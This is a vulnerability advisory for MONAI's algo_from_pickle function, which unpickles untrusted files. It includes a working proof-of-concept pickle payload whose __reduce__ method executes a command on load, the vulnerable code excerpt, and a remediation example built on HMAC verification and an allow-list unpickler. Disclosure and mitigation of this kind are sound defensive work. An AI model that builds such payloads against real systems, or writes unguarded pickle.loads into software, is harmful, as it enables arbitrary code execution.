PT-2026-33562 · Pypi · Monai
Published 2026-04-07 · Updated 2026-04-07
CVSS v3.1: 7.6 (High)
| Vector | AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:H |
Summary
The algo_from_pickle function in monai/auto3dseg/utils.py reads a file and passes its contents straight to pickle.loads(data_bytes) without validating the input in any way. This is insecure deserialization of untrusted data and can result in code execution.
Details
PoC
```python
import pickle
import subprocess


class MaliciousAlgo:
    # pickle invokes the returned callable with these arguments on load
    def __reduce__(self):
        return (subprocess.call, (['calc.exe'],))


malicious_algo_bytes = pickle.dumps(MaliciousAlgo())
attack_data = {
    "algo_bytes": malicious_algo_bytes,
}
attack_pickle_file = "attack_algo.pkl"
with open(attack_pickle_file, "wb") as f:
    f.write(pickle.dumps(attack_data))
```
Generate the malicious file "attack_algo.pkl" with the PoC above, then pass it to the vulnerable function:
```python
from monai.auto3dseg.utils import algo_from_pickle

attack_pickle_file = "attack_algo.pkl"
result = algo_from_pickle(attack_pickle_file)
```
Ultimately this reaches pickle.loads on the file contents, and the embedded command is executed, confirming the vulnerability.
Cause of the vulnerability (excerpt of the affected function in monai/auto3dseg/utils.py):
```python
import pickle
from typing import Any

from monai.config import PathLike


def algo_from_pickle(pkl_filename: str, template_path: PathLike | None = None, **kwargs: Any) -> Any:
    with open(pkl_filename, "rb") as f_pi:
        data_bytes = f_pi.read()
    # file contents are unpickled with no check of their origin or content
    data = pickle.loads(data_bytes)
    # (remainder of the function omitted)
```
Impact
Arbitrary code execution
Repair suggestions
Verify the data source and content before deserializing, or use a safe deserialization method
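One way to apply that suggestion, as an added example that is not taken from the advisory or from MONAI's code: check the file's origin with an HMAC under a key the application controls, then deserialize with a restricted unpickler whose find_class only resolves an allow-list of globals, so a pickle that references an unexpected callable (the shape of the PoC's __reduce__) is rejected before anything is called. The allow-list, key and sample payloads are constructed for the demonstration.

```python
import hashlib
import hmac
import io
import os
import pickle

# Constructed allow-list: the only globals the unpickler may resolve.
SAFE_GLOBALS = {"builtins": {"dict", "list", "tuple", "set", "str", "int", "float", "bool", "bytes"}}


class RestrictedUnpickler(pickle.Unpickler):
    # find_class is consulted for every GLOBAL/STACK_GLOBAL opcode, i.e. before
    # any callable named in a __reduce__ payload can be looked up or invoked.
    def find_class(self, module, name):
        if name in SAFE_GLOBALS.get(module, ()):
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"global {module}.{name} is not allowed")


def sign(data: bytes, key: bytes) -> bytes:
    return hmac.new(key, data, hashlib.sha256).digest()


def load_trusted(data: bytes, tag: bytes, key: bytes):
    # Verify origin first (HMAC over the raw bytes), then deserialize restrictively.
    if not hmac.compare_digest(sign(data, key), tag):
        raise ValueError("integrity check failed; refusing to deserialize")
    return RestrictedUnpickler(io.BytesIO(data)).load()


class UnexpectedGlobal:
    # Same shape as the advisory's MaliciousAlgo; the target is harmless here
    # (os.getcwd) because find_class rejects it before it is ever called.
    def __reduce__(self):
        return (os.getcwd, ())


def demo() -> dict:
    key = b"constructed-demo-key"  # in practice a secret held by the application
    good = pickle.dumps({"algo_bytes": b"serialized-algo", "template_path": "templates"})
    bad = pickle.dumps(UnexpectedGlobal())
    out = {"good": load_trusted(good, sign(good, key), key)}
    try:  # correctly signed, so the only remaining gate is find_class
        load_trusted(bad, sign(bad, key), key)
        out["bad_blocked"] = False
    except pickle.UnpicklingError:
        out["bad_blocked"] = True
    try:  # valid content but wrong tag: rejected before unpickling starts
        load_trusted(good, b"\x00" * 32, key)
        out["tamper_blocked"] = False
    except ValueError:
        out["tamper_blocked"] = True
    return out
```

Every legitimate class the payload needs must be added to the allow-list deliberately; permitting any global that can run arbitrary callables (subprocess, os, builtins such as eval or getattr) undoes the protection.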
Weakness Enumeration
Deserialization of Untrusted Data
Related Identifiers
Affected Products
Monai